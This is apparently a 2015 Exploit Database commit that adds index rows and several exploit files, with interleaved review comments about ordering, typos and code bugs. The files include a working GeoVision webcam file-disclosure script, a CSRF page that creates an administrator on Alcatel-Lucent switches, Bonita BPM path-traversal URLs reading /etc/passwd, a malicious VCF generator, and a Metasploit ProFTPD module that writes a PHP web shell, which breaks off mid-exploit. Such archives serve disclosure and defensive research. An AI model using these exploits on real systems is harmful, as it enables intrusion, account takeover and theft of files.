DB: 2015-06-11

16 new exploits
This commit is contained in:
Offensive Security 2015-06-11 05:02:28 +00:00
parent 5ff70806ea
commit 5aabf25b26
17 changed files with 1437 additions and 1 deletions


@ -33486,6 +33486,9 @@ id,file,description,date,author,platform,type,port
37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0 37096,platforms/php/webapps/37096.html,"Anchor CMS 0.6-14-ga85d0a0 - 'id' Parameter Multiple HTML Injection Vulnerabilities",2012-04-20,"Gjoko Krstic",php,webapps,0
37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0 37097,platforms/ios/remote/37097.py,"FTP Media Server 3.0 - Authentication Bypass and Denial of Service",2015-05-25,"Wh1t3Rh1n0 (Michael Allen)",ios,remote,0
37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0 37098,platforms/windows/local/37098.txt,"Microsoft Windows - Local Privilege Escalation (MS15-010)",2015-05-25,"Sky lake",windows,local,0
37253,platforms/php/webapps/37253.txt,"Paypal Currencucy Converter Basic For Woocommerce File Read",2015-06-10,Kuroi'SH,php,webapps,0
37254,platforms/php/webapps/37254.txt,"Wordpress History Collection <=1.1.1 Arbitrary File Download",2015-06-10,Kuroi'SH,php,webapps,80
37255,platforms/php/webapps/37255.txt,"Pandora FMS 5.0_ 5.1 - Authentication Bypass",2015-06-10,"Manuel Mancera",php,webapps,0
37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0 37100,platforms/php/webapps/37100.txt,"Waylu CMS 'products_xx.php' SQL Injection and HTML Injection Vulnerabilities",2012-04-20,TheCyberNuxbie,php,webapps,0
37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0 37101,platforms/php/webapps/37101.txt,"Joomla CCNewsLetter Module 1.0.7 'id' Parameter SQL Injection Vulnerability",2012-04-23,E1nzte1N,php,webapps,0
37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0 37102,platforms/php/webapps/37102.txt,"Joomla! Video Gallery component Local File Include and SQL Injection Vulnerabilities",2012-04-24,KedAns-Dz,php,webapps,0
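Review bot: the three new rows 37253, 37254 and 37255 are inserted between ids 37098 and 37100, which breaks the ascending id order the rest of files.csv follows; they belong after the last 372xx entry at the end of the file. In 37253's description 'Currencucy' should be 'Currency', and unlike its neighbours the description has no ' - ' separator before the vulnerability class (compare 37255's 'Pandora FMS 5.0_ 5.1 - Authentication Bypass'). The port column is also inconsistent within the same hunk: 37254 carries 80 while 37253 and 37255 carry 0 for the same class of PHP web application issue.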
@ -33593,6 +33596,7 @@ id,file,description,date,author,platform,type,port
37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0 37212,platforms/windows/local/37212.html,"1 Click Extract Audio 2.3.6 - Activex Buffer Overflow",2015-06-05,metacom,windows,local,0
37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal and Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0 37213,platforms/ios/webapps/37213.txt,"WiFi HD 8.1 - Directory Traversal and Denial of Service",2015-06-06,"Wh1t3Rh1n0 (Michael Allen)",ios,webapps,0
37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0 37214,platforms/hardware/webapps/37214.txt,"Broadlight Residential Gateway DI3124 - Unauthenticated Remote DNS Change",2015-06-06,"Todor Donev",hardware,webapps,0
37252,platforms/php/webapps/37252.txt,"Wordpress RobotCPA Plugin V5 - Local File Inclusion",2015-06-10,T3N38R15,php,webapps,80
37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross Site Scripting Vulnerability",2012-05-16,"Daniel Godoy",php,webapps,0 37216,platforms/php/webapps/37216.txt,"Unijimpe Captcha 'captchademo.php' Cross Site Scripting Vulnerability",2012-05-16,"Daniel Godoy",php,webapps,0
37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0 37217,platforms/php/webapps/37217.txt,"Artiphp 5.5.0 Neo 'index.php' Multiple Cross Site Scripting Vulnerabilities",2012-05-17,"Gjoko Krstic",php,webapps,0
37218,platforms/jsp/webapps/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,webapps,0 37218,platforms/jsp/webapps/37218.txt,"Atlassian Tempo 6.4.3_ JIRA 5.0 0_ Gliffy 3.7.0 XML Parsing Denial of Service Vulnerability",2012-05-17,anonymous,jsp,webapps,0
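Review bot: 37252 is inserted between 37214 and 37216 rather than in the block of 3725x rows this commit appends further down, so the id column is out of order here too; it also uses port 80 while the surrounding webapps rows use 0. Suggest moving the row to the end-of-file block and settling on one convention for the port field of webapps entries (0 unless the advisory actually pins a port).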
@ -33608,11 +33612,23 @@ id,file,description,date,author,platform,type,port
37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37228,platforms/php/webapps/37228.txt,"concrete5 index.php/tools/required/files/add_to searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37229,platforms/php/webapps/37229.txt,"concrete5 index.php/tools/required/files/permissions searchInstance Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0 37230,platforms/php/webapps/37230.txt,"concrete5 index.php/tools/required/dashboard/sitemap_data.php Multiple Parameter XSS",2012-05-20,AkaStep,php,webapps,0
37248,platforms/php/webapps/37248.txt,"SV: Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0 37248,platforms/php/webapps/37248.txt,"Milw0rm Clone Script v1.0 - (time based) SQLi",2015-06-09,"John Smith",php,webapps,0
37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37237,platforms/hardware/webapps/37237.txt,"D-Link DSL-2780B DLink_1.01.14 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37238,platforms/hardware/webapps/37238.txt,"TP-Link ADSL2+ TD-W8950ND - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0 37239,platforms/windows/dos/37239.html,"Microsoft Internet Explorer 11 - Crash PoC",2015-06-08,"Pawel Wylecial",windows,dos,0
37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37240,platforms/hardware/webapps/37240.txt,"D-Link DSL-2730B AU_2.01 - Authentication Bypass DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0 37241,platforms/hardware/webapps/37241.txt,"D-Link DSL-526B ADSL2+ AU_2.01 - Unauthenticated Remote DNS Change",2015-06-08,"Todor Donev",hardware,webapps,0
37243,platforms/php/webapps/37243.txt,"Wordpress Wp-ImageZoom 1.1.0 - Multiple Vulnerabilities",2015-06-08,T3N38R15,php,webapps,80
37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0 37244,platforms/php/webapps/37244.txt,"Wordpress Plugin 'WP Mobile Edition' - LFI Vulnerability",2015-06-08,"Ali Khalil",php,webapps,0
37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0 37245,platforms/php/webapps/37245.txt,"Pasworld detail.php - Blind Sql Injection Vulnerability",2015-06-08,"Sebastian khan",php,webapps,0
37249,platforms/linux/dos/37249.py,"Libmimedir VCF Memory Corruption PoC",2015-06-10,"Jeremy Brown",linux,dos,0
37250,platforms/xml/webapps/37250.txt,"HP WebInspect <= 10.4 XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
37256,platforms/multiple/webapps/37256.txt,"Heroku Bug Bounty #2 - (API) Re Auth Session Bypass Vulnerability",2015-06-10,Vulnerability-Lab,multiple,webapps,0
37257,platforms/php/webapps/37257.txt,"FiverrScript CSRF Vulnerability (Add New Admin)",2015-06-10,"Mahmoud Gamal",php,webapps,80
37258,platforms/hardware/webapps/37258.py,"GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit",2015-06-10,"Viktor Minin",hardware,webapps,0
37259,platforms/php/webapps/37259.txt,"ISPConfig 3.0.5.4p6 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",php,webapps,443
37260,platforms/jsp/webapps/37260.txt,"Bonita BPM 6.5.1 - Multiple Vulnerabilities",2015-06-10,"High-Tech Bridge SA",jsp,webapps,80
37261,platforms/hardware/webapps/37261.txt,"Alcatel-Lucent OmniSwitch - CSRF Vulnerability",2015-06-10,"RedTeam Pentesting",hardware,webapps,80
37262,platforms/linux/remote/37262.rb,"ProFTPD 1.3.5 Mod_Copy Command Execution",2015-06-10,metasploit,linux,remote,0
37263,platforms/php/webapps/37263.txt,"AnimaGallery 2.6 - Local File Inclusion",2015-06-10,d4rkr0id,php,webapps,80
37264,platforms/php/webapps/37264.txt,"WordPress Encrypted Contact Form Plugin 1.0.4 - CSRF Vulnerability",2015-06-10,"Nitin Venkatesh",php,webapps,80
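Review bot: the edit to 37248 correctly drops the stray 'SV:' mail-subject prefix from the description, but the row still sits before 37237 and so remains out of id order; while the line is being touched it should be moved after 37245. In the appended block the port field mixes 0, 80 and 443 for entries of the same type (37257 and 37259 versus 37258), 'Wordpress' (37243) and 'WordPress' (37264) are spelled differently, and 37258's description ('GeoVision (GeoHttpServer) Webcams Remote File Disclosure Exploit') is the only one in the block that appends the word 'Exploit'. Id 37251 is skipped between 37250 and 37252; if that is intentional it is worth a word in the commit message.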



@ -0,0 +1,79 @@
#!/usr/bin/python
import os
import sys
import socket
import binascii
'''
Title : GeoVision GeoHttpServer WebCams Remote File Disclosure Exploit
CVE-ID : none
Product : GeoVision
System : GeoHttpServer
Affected : 8.3.3.0 (may be more)
Impact : Critical
Remote : Yes
Website link: http://www.geovision.com.tw/
Reported : 10/06/2015
Author : Viktor Minin, minin.viktor@gmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
No authentication (login) is required to exploit this vulnerability.
The GeoVision GeoHttpServer application is prone to a remote file disclosure vulnerability.
An attacker can exploit this vulnerability to retrieve and download stored files on server such as 'boot.ini' and 'win.ini' by using a simple url request which made by browser.
'''
#os.system("cls")
os.system('title GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit');
os.system('color 2');
socket.setdefaulttimeout = 0.50
os.environ['no_proxy'] = '127.0.0.1,localhost'
CRLF = "\r\n"
def main():
print "#######################################################################"
print "# GeoVision GeoHttpServer Webcams Remote File Disclosure Exploit"
print "# Usage: <ip> <port> <file>"
print "# Example: " +sys.argv[0]+ " 127.0.0.1 1337 windows\win.ini"
print "#######################################################################"
exit()
try:
url = sys.argv[1]
port = int(sys.argv[2])
#files = open(sys.argv[3],'r').read().split()
file = sys.argv[3]
except:
main()
def recvall(sock):
data = ""
part = None
while part != "":
part = sock.recv(4096)
data += part
return data
def request(url, port, pfile):
PATH = str(pfile)
HOST = url
PORT = port
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.connect((HOST, PORT))
sock.send("GET /...\...\\" + PATH + "%s HTTP/1.0\r\n\r\n" % (CRLF))
data = recvall(sock)
temp = data.split("\r\n\r\n")
sock.shutdown(1)
sock.close()
return temp[1]
ret = request(url, port, file)
hex = "".join("{:02x}".format(ord(c)) for c in ret)
bin = binascii.unhexlify(hex)
print ret
file = open(file.replace('\\', '_'),"wb")
file.write(bin)
file.close()
#~EOF
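Review bot: `socket.setdefaulttimeout = 0.50` assigns over the function instead of calling it (`socket.setdefaulttimeout(0.50)`), so no timeout is ever set and recvall() blocks until the server closes the connection. In request(), the `%` operator binds only to the last string literal, so the CRLF is inserted before ' HTTP/1.0' rather than after it and the server receives the bare request line followed by ' HTTP/1.0' on its own line; if GeoHttpServer is meant to be driven HTTP/0.9-style this deserves a comment, otherwise build the line as `"GET /...\...\\" + PATH + " HTTP/1.0" + CRLF + CRLF`. `temp[1]` raises IndexError when the reply contains no blank line and, because split() is unbounded, any file body that itself contains '\r\n\r\n' is truncated at that point; use `data.split("\r\n\r\n", 1)[1]`. The hex/unhexlify round trip is a no-op (`bin` equals `ret`) and shadows the builtins `hex`, `bin` and `file`. The `os.system('title ...')` and `os.system('color 2')` calls are cmd.exe-only and just print errors when run under the `#!/usr/bin/python` shebang on Linux.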


@ -0,0 +1,206 @@
Advisory: Alcatel-Lucent OmniSwitch Web Interface Cross-Site Request Forgery
During a penetration test, RedTeam Pentesting discovered a vulnerability
in the management web interface of an Alcatel-Lucent OmniSwitch 6450.
The management web interface has no protection against cross-site
request forgery attacks. This allows specially crafted web pages to
change the switch configuration and create users, if an administrator
accesses the website while being authenticated in the management web
interface.
Details
=======
Product: Alcatel-Lucent OmniSwitch 6450, 6250, 6850E, 9000E, 6400,
6855, 6900, 10K, 6860
Affected Versions: All Releases:
AOS 6.4.5.R02
AOS 6.4.6.R01
AOS 6.6.4.R01
AOS 6.6.5.R02
AOS 7.3.2.R01
AOS 7.3.3.R01
AOS 7.3.4.R01
AOS 8.1.1.R01
Fixed Versions: -
Vulnerability Type: Cross-site request forgery
Security Risk: medium
Vendor URL: http://enterprise.alcatel-lucent.com/?product=OmniSwitch6450&page=overview
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-004
Advisory Status: published
CVE: CVE-2015-2805
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2805
Introduction
============
"The Alcatel-Lucent OmniSwitch 6450 Gigabit and Fast Ethernet Stackable
LAN Switches are the latest value stackable switches in the OmniSwitch
family of products. The OmniSwitch 6450 was specifically built for
versatility offering optional upgrade paths for 10 Gigabit stacking, 10
Gigabit Ethernet uplinks, from Fast to Gigabit user ports (L models) and
Metro Ethernet services."
(from the vendor's homepage)
More Details
============
The management web interface of the OmniSwitch 6450 can be accessed
using a web browser via HTTP. The web interface allows creating new user
accounts, in this case an HTTP request like the following is sent to the
switch:
POST /sec/content/sec_asa_users_local_db_add.html HTTP/1.1
Host: 192.0.2.1
[...]
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 214
EmWeb_ns:mip:2.T1:I1=attacker
&EmWeb_ns:mip:244.T1:O1=secret
&EmWeb_ns:mip:246.T1:O2=-1
&EmWeb_ns:mip:248.T1:O3=
&EmWeb_ns:mip:249.T1:O4=1
&EmWeb_ns:mip:250.T1:O5=4
This request creates a user "attacker" with the password "secret". All
other parametres are static. All POST parametres can be predicted by
attackers
This means that requests of this form can be prepared by attackers and sent
from any web page the user visits in the same browser. If the user is
authenticated to the switch, a valid session cookie is included in the request
automatically, and the action is performed.
In order to activate the new user for the web interface it is necessary
to enable the respective access privileges in the user's profile. This can also
be done via the web interface. Then the HTTP POST request looks like the
following:
POST /sec/content/os6250_sec_asa_users_local_db_family_mod.html HTTP/1.1
Host: 192.0.2.1
[...]
Cookie: session=sess_15739
Content-Type: application/x-www-form-urlencoded
Content-Length: 167
EmWeb_ns:mip:2.T1:I1=attacker
&EmWeb_ns:mip:4.T1:O1=
&EmWeb_ns:mip:5.T1:O2=
&EmWeb_ns:mip:6.T1:O3=4294967295
&EmWeb_ns:mip:7.T1:O4=4294967295
This request sets all access privileges for the user "attacker" and
is again completely predictable.
Proof of Concept
================
Visiting the following HTML page will create a new user via the switch's
management web interface, if the user is authenticated at the switch:
------------------------------------------------------------------------
<html>
<head>
<title>Alcatel-Lucent OmniSwitch 6450 create user via CSRF</title>
</head>
<body>
<form action="http://192.0.2.1/sec/content/sec_asa_users_local_db_add.html"
method="POST" id="CSRF" style="visibility:hidden">
<input type="hidden" name="EmWeb_ns:mip:2.T1:I1" value="attacker" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O1" value="secret" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O2" value="-1" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O3" value="" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O4" value="1" />
<input type="hidden" name="EmWeb_ns:mip:244.T1:O5" value="4" />
</form>
<script>
document.getElementById("CSRF").submit();
</script>
</body>
</html>
------------------------------------------------------------------------
Workaround
==========
Disable the web interface by executing the following commands:
AOS6:
no ip service http
no ip service secure-http
AOS 7/8:
ip service http admin-state disable
If this is not possible, use a dedicated browser or browser profile for
managing the switch via the web interface.
Fix
===
Upgrade the firmware to a fixed version, according to the vendor the
fixed versions will be available at the end of July 2015.
Security Risk
=============
If attackers trick a logged-in administrator to visit an attacker-controlled
web page, the attacker can perform actions and reconfigure the switch. In this
situation an attacker can create an additional user account on the switch for
future access. While a successful attack results in full access to the switch,
the attack is hard to exploit because attackers need to know the IP address of
the switch and get an administrative user to access an attacker-controlled web
page. The vulnerability is therefore rated as a medium risk.
Timeline
========
2015-03-16 Vulnerability identified
2015-03-25 Customer approves disclosure to vendor
2015-03-26 CVE number requested
2015-03-31 CVE number assigned
2015-04-01 Vendor notified
2015-04-02 Vendor acknowledged receipt of advisories
2015-04-08 Requested status update from vendor, vendor is investigating
2015-04-29 Requested status update from vendor, vendor is still investigating
2015-05-22 Requested status update from vendor
2015-05-27 Vendor is working on the issue
2015-06-05 Vendor notified customers
2015-06-08 Vendor provided details about affected versions
2015-06-10 Advisory released
RedTeam Pentesting GmbH
=======================
RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.
As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.
More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.
--
RedTeam Pentesting GmbH Tel.: +49 241 510081-0
Dennewartstr. 25-27 Fax : +49 241 510081-99
52068 Aachen https://www.redteam-pentesting.de
Germany Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
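Review bot: the hidden-input names in the proof-of-concept form do not match the request shown under 'More Details': the captured POST uses EmWeb_ns:mip:246.T1:O2, 248.T1:O3, 249.T1:O4 and 250.T1:O5, while the form posts 244.T1:O2 through 244.T1:O5 (only 2.T1:I1 and 244.T1:O1 agree). One of the two is wrong and the PoC as written would likely be ignored by the switch; please reconcile them. 'parametres' (twice, in the paragraph after the first request) should be 'parameters', and 'All POST parametres can be predicted by attackers' is missing its full stop. The 'Fixed Versions: -' field in the header should say 'none yet' or point to the end-of-July 2015 date given in the Fix section so the two do not read as contradictory.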

66
platforms/jsp/webapps/37260.txt Executable file

@ -0,0 +1,66 @@
Advisory ID: HTB23259
Product: Bonita BPM
Vendor: Bonitasoft
Vulnerable Version(s): 6.5.1 and probably prior
Tested Version: 6.5.1 (Windows and Mac OS packages)
Advisory Publication: May 7, 2015 [without technical details]
Vendor Notification: May 7, 2015
Vendor Patch: June 9, 2015
Public Disclosure: June 10, 2015
Vulnerability Type: Path Traversal [CWE-22], Open Redirect [CWE-601]
CVE References: CVE-2015-3897, CVE-2015-3898
Risk Level: High
CVSSv2 Base Scores: 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N), 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab two vulnerabilities in Bonita BPM Portal (Bonita's web interface running by default on port 8080), which can be exploited by remote non-authenticated attacker to compromise the vulnerable web application and the web server on which it is hosted.
1) Path Traversal in Bonita BPM Portal: CVE-2015-3897
User-supplied input passed via the "theme" and "location" HTTP GET parametres to "bonita/portal/themeResource" URL is not properly verified before being used as part of file name. The attacker may download any system file accessible to the web server user.
Simple PoC code below will return content of "C:/Windows/system.ini" file:
http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/system.ini
Second PoC will disclose the content of "/etc/passwd" file:
http://[HOST]/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
2) Open Redirect in Bonita BPM Portal: CVE-2015-3898
Input passed via the "redirectUrl" HTTP GET parametre to "/bonita/login.jsp" script and "/bonita/loginservice" URLs is not properly verified before being used as redirect URL.
After login user may be redirected to arbitrary website:
http://[HOST]/bonita/login.jsp?_l=en&redirectUrl=//immuniweb.com/
-----------------------------------------------------------------------------------------------
Solution:
Update to Bonita BPM 6.5.3
More Information:
http://community.bonitasoft.com/blog/bonita-bpm-653-available
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23259 - https://www.htbridge.com/advisory/HTB23259 - Arbitrary File Disclosure and Open Redirect in Bonita BPM.
[2] Bonita BPM - http://www.bonitasoft.com/ - Bonita BPM for business process applications - the BPM platform that gives developers freedom to create and manage highly customizable business apps.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
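Review bot: the first sentence of 'Advisory Details' is missing its verb ('High-Tech Bridge Security Research Lab discovered two vulnerabilities ...'), and 'parametres' appears twice where 'parameters' is meant. In the path traversal PoC the traversal sequence is carried in the 'theme' parameter (portal/../../...) while 'location' names the file to read, so the sentence 'passed via the "theme" and "location" HTTP GET parametres' should say which parameter does what; the sixteen '../' segments are more than any realistic install depth needs but harmless. The two CVSSv2 scores are listed without saying which CVE each belongs to; label 7.8 (AV:N/AC:L/Au:N/C:C/I:N/A:N) as CVE-2015-3897 and 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) as CVE-2015-3898 so readers do not pair the high score with the open redirect.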

51
platforms/linux/dos/37249.py Executable file

@ -0,0 +1,51 @@
#!/usr/bin/python
# libmimedir-free.py
#
# Libmimedir VCF Memory Corruption PoC (CVE-2015-3205)
#
# Jeremy Brown [jbrown3264/gmail]
# June 2015
#
# -Synopsis-
#
# Adding two NULL bytes to the end of a VCF file allows a user to manipulate free() calls
# which occur during it's lexer's memory clean-up procedure. This could lead to exploitable
# conditions such as crafting a specific memory chunk to allow for arbitrary code execution.
#
# -Tested-
#
# libmimedir-0.5.1.tar.gz
# libmimedir-static 0.4-13.fc21
#
# -Notes-
#
# Reported to Red Hat Bugzilla in May (1222251) and remains unfixed as of now. There's already
# a stale bug (1049214) to upgrade to latest upstream and there wasn't a movement to work on a
# fix with this one. yy_get_next_buffer() in dirlex.c would likely take the patch.
#
from struct import pack
def main():
mime = "begin:vcard<x\nx;type=x;type=x,"
mime += pack("<Q", 0x4141414141414141) # mdm->p
mime += pack("<Q", 0x4242424242424242) # mdm->next
mime += ":x>x.l:x"
mime += pack("<H", 0x0000) # 2 x YY_END_OF_BUFFER_CHAR
print("Writing free.vcf to local directory...")
try:
with open("free.vcf", 'wb') as outfile:
outfile.write(mime)
except Exception as error:
print("Error: %s\n" % error);
return
print("Done\n")
return
if __name__ == "__main__":
main()
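Review bot: the script only runs under Python 2: pack() returns bytes, so `mime += pack("<Q", ...)` is a str + bytes concatenation that raises TypeError on Python 3, and the `'wb'` write would reject a str anyway. Making the literals bytes (`mime = b"begin:vcard<x\nx;type=x;type=x,"` and `mime += b":x>x.l:x"`) makes it work on both interpreters. The stray semicolon after the print call in the except branch can go, and 'it's lexer's' in the synopsis should be 'its lexer's'. It would also help to state which consumer the generated free.vcf is meant to be fed to (the libmimedir test binary or an application linked against it), since the PoC only writes the file and the reader otherwise has to guess how to trigger the free() path described in the synopsis.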

148
platforms/linux/remote/37262.rb Executable file

@ -0,0 +1,148 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'ProFTPD 1.3.5 Mod_Copy Command Execution',
'Description' => %q{
This module exploits the SITE CPFR/CPTO commands in ProFTPD version 1.3.5.
Any unauthenticated client can leverage these commands to copy files from any
part of the filesystem to a chosen destination. The copy commands are executed with
the rights of the ProFTPD service, which by default runs under the privileges of the
'nobody' user. By using /proc/self/cmdline to copy a PHP payload to the website
directory, PHP remote code execution is made possible.
},
'Author' =>
[
'Vadim Melihow', # Original discovery, Proof of Concept
'xistence <xistence[at]0x90.nl>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2015-3306' ],
[ 'EDB', '36742' ]
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Payload' =>
{
'BadChars' => '',
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic gawk bash python perl'
}
},
'Targets' =>
[
[ 'ProFTPD 1.3.5', { } ]
],
'DisclosureDate' => 'Apr 22 2015',
'DefaultTarget' => 0))
register_options(
[
OptPort.new('RPORT', [true, 'HTTP port', 80]),
OptPort.new('RPORT_FTP', [true, 'FTP port', 21]),
OptString.new('TARGETURI', [true, 'Base path to the website', '/']),
OptString.new('TMPPATH', [true, 'Absolute writable path', '/tmp']),
OptString.new('SITEPATH', [true, 'Absolute writable website path', '/var/www'])
], self.class)
end
def check
ftp_port = datastore['RPORT_FTP']
sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
if sock.nil?
fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
else
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
end
res = sock.get_once(-1, 10)
unless res && res.include?('220')
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
end
sock.puts("SITE CPFR /etc/passwd\r\n")
res = sock.get_once(-1, 10)
if res && res.include?('350')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
ftp_port = datastore['RPORT_FTP']
get_arg = rand_text_alphanumeric(5+rand(3))
payload_name = rand_text_alphanumeric(5+rand(3)) + '.php'
sock = Rex::Socket.create_tcp('PeerHost' => rhost, 'PeerPort' => ftp_port)
if sock.nil?
fail_with(Failure::Unreachable, "#{rhost}:#{ftp_port} - Failed to connect to FTP server")
else
print_status("#{rhost}:#{ftp_port} - Connected to FTP server")
end
res = sock.get_once(-1, 10)
unless res && res.include?('220')
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure retrieving ProFTPD 220 OK banner")
end
print_status("#{rhost}:#{ftp_port} - Sending copy commands to FTP server")
sock.puts("SITE CPFR /proc/self/cmdline\r\n")
res = sock.get_once(-1, 10)
unless res && res.include?('350')
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from /proc/self/cmdline")
end
sock.put("SITE CPTO #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
res = sock.get_once(-1, 10)
unless res && res.include?('250')
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying to temporary payload file")
end
sock.put("SITE CPFR #{datastore['TMPPATH']}/.<?php passthru($_GET[\'#{get_arg}\']);?>\r\n")
res = sock.get_once(-1, 10)
unless res && res.include?('350')
fail_with(Failure::Unknown, "#{rhost}:#{ftp_port} - Failure copying from temporary payload file")
end
sock.put("SITE CPTO #{datastore['SITEPATH']}/#{payload_name}\r\n")
res = sock.get_once(-1, 10)
